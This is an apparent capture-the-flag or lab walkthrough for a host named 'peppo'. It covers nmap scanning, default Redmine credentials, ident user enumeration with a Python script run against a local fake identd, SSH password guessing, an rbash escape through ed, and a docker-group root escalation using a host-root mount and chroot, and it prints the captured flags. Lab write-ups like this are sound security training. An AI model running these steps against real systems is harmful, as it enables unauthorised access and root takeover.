Enum
# IP is the target, e.g. IP=192.168.156.60 (-oN, not -o: plain -o is not a valid output flag)
sudo nmap -T4 -A -v -oN nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -oN vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -oN alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -oN alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, starting udp (slowwwwww)"
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -oN udp --min-rate 1000 $IP
Services:
Discovered open port 113/tcp on 192.168.156.60
Discovered open port 22/tcp on 192.168.156.60
Discovered open port 8080/tcp on 192.168.156.60
Discovered open port 5432/tcp on 192.168.156.60
Discovered open port 10000/tcp on 192.168.156.60
Interesting services:
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 12.3 - 12.4
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
Redmine on 8080
admin:admin (default creds) gets us in
can't find anything useful here, this Redmine version is not vuln.
113 ident: identd tells you which local user owns the process on the server side of a live connection
113 - Pentesting Ident | HackTricks
ident-user-enum 192.168.156.60 22 113 10000 8080 53 5432
eleanor
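The ident-user-enum step above, redone by hand as an added example (this is not code from the original notes or from ident-user-enum). identd (RFC 1413) only answers about live connections, so for each target port the script opens a real connection first, then asks identd who owns the server side of that (server-port, client-port) pair, and parses the `USERID` / `ERROR` reply. The lab target at the bottom (a fake identd plus dummy listeners on 127.0.0.1, with made-up owners) is constructed so the exchange runs offline; against the real box you would call `enumerate_users("192.168.156.60", [22, 8080, 10000, 5432])` with the default ident port 113.

```python
import socket
import threading
from typing import Dict, Optional

IDENT_PORT = 113


def parse_ident_response(line: str) -> Optional[str]:
    """Return the user-id from an RFC 1413 reply, or None.

    Success: '22, 51234 : USERID : UNIX : eleanor'
    Failure: '22, 51234 : ERROR : NO-USER'
    The opsys field may carry a charset ('UNIX,US-ASCII'), so split on ':' only.
    """
    parts = [p.strip() for p in line.strip().split(":", 3)]
    if len(parts) == 4 and parts[1] == "USERID":
        return parts[3]
    return None


def ident_user_for_port(host: str, port: int, ident_port: int = IDENT_PORT,
                        timeout: float = 5.0) -> Optional[str]:
    """Ask identd on host which user owns the service listening on port."""
    # identd will only answer about a connection that exists, so open one first
    svc = socket.create_connection((host, port), timeout=timeout)
    try:
        client_port = svc.getsockname()[1]
        with socket.create_connection((host, ident_port), timeout=timeout) as ident:
            # query is "<server-port>, <client-port>\r\n"
            ident.sendall(f"{port}, {client_port}\r\n".encode("ascii"))
            reply = b""
            while not reply.endswith(b"\n") and len(reply) < 1024:
                chunk = ident.recv(1024)
                if not chunk:
                    break
                reply += chunk
        return parse_ident_response(reply.decode("ascii", errors="replace"))
    finally:
        svc.close()  # only now; the service connection must outlive the query


def enumerate_users(host: str, ports, ident_port: int = IDENT_PORT) -> Dict[int, Optional[str]]:
    """Map each port to its owning user; None if the port is closed or identd declines."""
    out: Dict[int, Optional[str]] = {}
    for port in ports:
        try:
            out[port] = ident_user_for_port(host, port, ident_port)
        except OSError:
            out[port] = None
    return out


# ---- constructed lab target, a stand-in for the real box (owners are made up) ----

def _listen() -> socket.socket:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    s.listen(8)
    return s


def _fake_identd(srv: socket.socket, owners: Dict[int, str], answers: int) -> None:
    """Answer `answers` queries from a {server-port: user} table, RFC 1413 style."""
    for _ in range(answers):
        conn, _ = srv.accept()
        with conn:
            req = conn.recv(128).decode("ascii", errors="replace")
            sport, cport = (x.strip() for x in req.split(",", 1))
            user = owners.get(int(sport))
            if user is None:
                conn.sendall(f"{sport}, {cport} : ERROR : NO-USER\r\n".encode("ascii"))
            else:
                conn.sendall(f"{sport}, {cport} : USERID : UNIX : {user}\r\n".encode("ascii"))


def demo() -> Dict[str, Optional[str]]:
    """Enumerate a fake 'ssh', a fake 'web' and a closed port through the fake identd."""
    ssh, web, ident = _listen(), _listen(), _listen()
    probe = _listen()
    closed_port = probe.getsockname()[1]
    probe.close()  # nothing listens here any more -> connection refused -> None
    ports = {"ssh": ssh.getsockname()[1], "web": web.getsockname()[1], "closed": closed_port}
    owners = {ports["ssh"]: "eleanor", ports["web"]: "nobody"}  # constructed mapping
    t = threading.Thread(target=_fake_identd, args=(ident, owners, 2), daemon=True)
    t.start()
    try:
        by_port = enumerate_users("127.0.0.1", ports.values(), ident.getsockname()[1])
    finally:
        for s in (ssh, web, ident):
            s.close()
    t.join(timeout=5)
    return {name: by_port[p] for name, p in ports.items()}


if __name__ == "__main__":
    print(demo())  # {'ssh': 'eleanor', 'web': 'nobody', 'closed': None}
```

The point worth remembering is the ordering: the probe connection to the service has to stay open until identd has replied, otherwise the daemon has no connection to look up and answers NO-USER. On a real target the interesting result is any service that is not owned by root or nobody, since that name is a valid local account to try.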
Try username:username for SSH (it works, I swear)
ssh eleanor@192.168.156.60
creds
eleanor:eleanor
no nano, vim, cat, less, more, grep, or anything else on the restricted PATH
How to read local.txt?
rbash ☹️ (it also refuses commands with a / in them, so full paths are no help until we're out)
we can escape with ed: its ! command hands the rest of the line to a shell
ed
!/bin/bash
the new bash inherits rbash's restricted PATH, so call things by full path:
/usr/bin/vim local.txt
local
26495c8f4a09d26599c5c0b79da3ceb0
we are in the docker group (999(docker) below)
eleanor@peppo:~$ /usr/bin/id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
we can see the available docker images (docker invoked by relative path, PATH is still the restricted one)
./docker image ls
and priv esc: docker group is root-equivalent. Run a container from the local redmine image with the host root mounted at /mnt and chroot into it
./docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it redmine chroot /mnt bash
proof
9c82051f3d6387100a9a3b25e9c27672